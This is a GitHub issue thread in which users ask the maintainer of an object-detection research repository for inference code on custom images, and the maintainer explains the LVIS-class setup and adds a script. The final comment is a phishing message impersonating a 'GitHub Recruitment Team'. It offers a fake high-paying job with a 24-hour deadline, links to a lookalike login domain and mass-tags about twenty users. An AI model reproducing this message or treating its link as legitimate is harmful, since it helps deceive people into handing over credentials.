### ISSUE TITLE
Add inference code for user-defined data

### ISSUE THREAD

**Issue by chau25102001** [rohit901/cooperative-foundational-models#2]
Thanks for your great work.
Can you add a script for model inference on a single input image? Thanks in advance

**Comment by rohit901** [comment]
Hello,

Thank you for your interest in our work.
Sure, I will try to add the script for it ASAP, and will let you know. Please stay tuned, and you may also opt in to "Watch" this repository in the meanwhile.

Thanks

**Comment by ralpyna** [comment]
Interested in your work. Thank you very much for it.
It is the same request with @chau25102001.
I would like to compare with results of other model as qualitative.
Can I know your plans for this?

**Comment by rohit901** [comment]
Thank you for your interest.

Before I make that, I would like to make a note that in the "novel object detection" setting (i.e. Table 1 results), we use MaskRCNN weights trained on COCO images/labels (80 objects), and GDINO-SwinT (trained on O365,GoldG,Cap4M).

Further, during inference we evaluate for 1203 LVIS classes using class synonym information along with the class names.

Thus, hope it will be okay for you guys if I push a script that works on your custom image data, but still you would be detecting LVIS class objects in the image, and using the above two existing model weights itself.

If you would like more customization, I hope you would be able to make the necessary/required changes? @ralpyna @chau25102001

**Comment by rohit901** [comment]
@ralpyna, @chau25102001 
I have added the code for inference on custom images.
Please follow the instructions mentioned in the [README](https://github.com/rohit901/cooperative-foundational-models?tab=readme-ov-file#inference-on-custom-images) to test it on your images.

I hope this will help you, and you would be able to modify or make other changes depending on your use case. 

Please let me know whether I can close this issue or not.

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
scrambled2, @micheleriva, @AlexanderKaraberov, @jianan1104, @chitoya, @microboym, @lichuang, @wbjang, @Dandelight, @8times4, @msau9, @daoxuliu, @antx-code, @ieshreya, @neilyoung2008, @Quantribution, @Srini-98, @simplyjaga, @vioxcd, @zkbqhuang
